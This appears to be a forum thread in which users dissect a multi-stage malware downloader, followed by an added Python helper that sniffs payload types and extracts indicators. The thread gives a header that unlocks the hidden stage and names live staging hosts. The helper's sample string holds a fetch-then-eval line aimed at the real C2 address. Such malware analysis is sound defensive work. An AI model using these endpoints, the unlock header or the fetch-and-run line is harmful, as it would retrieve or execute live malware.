Same here.

I tried content-types, user-agent, but no luck. I'm not sure what the user-agent of `req` is, but the default `node-fetch/1.0` does make the response json. They are a 307, but the result is a png.

I presume the original payload may have contained information that the hackers want to keep from prying eyes. Esp. now that it landed on HN, it makes sense to take it offline and replace with an actual png to avoid people finding information in it that may harm their future hacks or so?

reply
Got it after adding the header: `bearrtoken: logo`.

Without seeing the request code I initially assumed it would be `Authorization: Bearer logo` that did the trick.

reply
So I fed it to qwen. It seems to think it's just a downloader and persistence mechanism for another payload. I will try to download it too and see what qwen thinks of that.
reply
thanks for following down the rabbit hole, let us know what you find! also... why qwen?
reply
> why qwen

I have it running locally, and I don't want to add credentials to the VM with the malware.

According to qwen:

It's cross platform

It has a bunch of persistence mechanisms.

It downloads another pack from pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev. Verified I got the secondary payload.

This pack looks like a python 3.10 environment along with an executable called cupsd.

And downloads another js script from http://138.201.125.58:1224/client/99/77

That script then proceeds to download three Python scripts that use the aforementioned Python environment and do their business; qwen is having trouble de-obfuscating their URLs and I am busy.

reply
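As an added example (not from the thread, and not the malware's or anyone's posted code): a small Python helper for the two things the posters above did by hand. It classifies a fetched body by its magic bytes instead of trusting the Content-Type header (the first comment saw a 307 whose final body was a PNG while the JSON/JS came back only with a particular header), and it pulls URL, host and IP:port indicators out of a text-stage payload for tracking the download chain. The sample bytes are constructed for this example; the two URLs in the sample use the host and endpoint quoted in this thread, with the r2.dev path unknown and therefore left off.

```python
import ipaddress
import json
import re
from typing import Dict, List, Optional

# PNG files begin with this fixed 8-byte signature; we sniff on it rather
# than on any Content-Type header the server chooses to send.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

# Constructed sample payloads (not real captures).
SAMPLE_PNG = PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 16
SAMPLE_JS = (
    b"var u='http://138.201.125.58:1224/client/99/77';\n"
    b"var p='https://pub-1fe39d600a4447ba895ef1c848d32e7e.r2.dev';\n"  # path unknown; omitted
    b"fetch(u).then(r => r.text()).then(eval);\n"
)


def sniff_payload(body: bytes) -> str:
    """Classify a fetched body from its contents: 'png', 'json', 'text' or 'binary'."""
    if body.startswith(PNG_MAGIC):
        return "png"
    try:
        text = body.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    try:
        json.loads(text)
        return "json"
    except ValueError:
        return "text"


# What each declared media type should look like once sniffed.
_EXPECTED = {
    "image/png": "png",
    "application/json": "json",
    "application/javascript": "text",
    "text/javascript": "text",
    "text/plain": "text",
}


def content_type_mismatch(content_type: str, body: bytes) -> Optional[bool]:
    """True if the declared Content-Type disagrees with the sniffed body,
    False if it agrees, None if the declared type is one we don't model."""
    declared = content_type.split(";", 1)[0].strip().lower()
    expected = _EXPECTED.get(declared)
    if expected is None:
        return None
    sniffed = sniff_payload(body)
    if expected == "text" and sniffed == "json":
        return False  # JSON is valid text/javascript or text/plain content
    return sniffed != expected


# Stops at whitespace, quotes, brackets and common JS punctuation.
_URL_RE = re.compile(rb"https?://[^\s'\"<>()\[\];,]+", re.IGNORECASE)


def extract_iocs(body: bytes) -> Dict[str, List[str]]:
    """Pull URLs from a text-stage payload and split them into hostnames,
    bare IPs and IP:port endpoints for use as indicators."""
    urls = sorted({m.decode("latin-1") for m in _URL_RE.findall(body)})
    hosts, ips, endpoints = set(), set(), set()
    for url in urls:
        authority = url.split("://", 1)[1].split("/", 1)[0]
        host, _, port = authority.partition(":")
        try:
            ipaddress.ip_address(host)
            ips.add(host)
            if port:
                endpoints.add(f"{host}:{port}")
        except ValueError:
            hosts.add(host.lower())
    return {
        "urls": urls,
        "hosts": sorted(hosts),
        "ips": sorted(ips),
        "endpoints": sorted(endpoints),
    }


if __name__ == "__main__":
    print("png sample sniffed as:", sniff_payload(SAMPLE_PNG))
    print("declared application/json, mismatch:", content_type_mismatch("application/json", SAMPLE_PNG))
    print("IOCs from JS sample:", extract_iocs(SAMPLE_JS))
```

When you replay a fetch with different headers (User-Agent, Content-Type, or a custom one like the `bearrtoken` header mentioned above), run each body through `sniff_payload` rather than eyeballing the response: a swapped-in decoy image and the real JSON stage are then told apart by their first bytes, and `extract_iocs` gives you the next hop to pull from the same isolated VM.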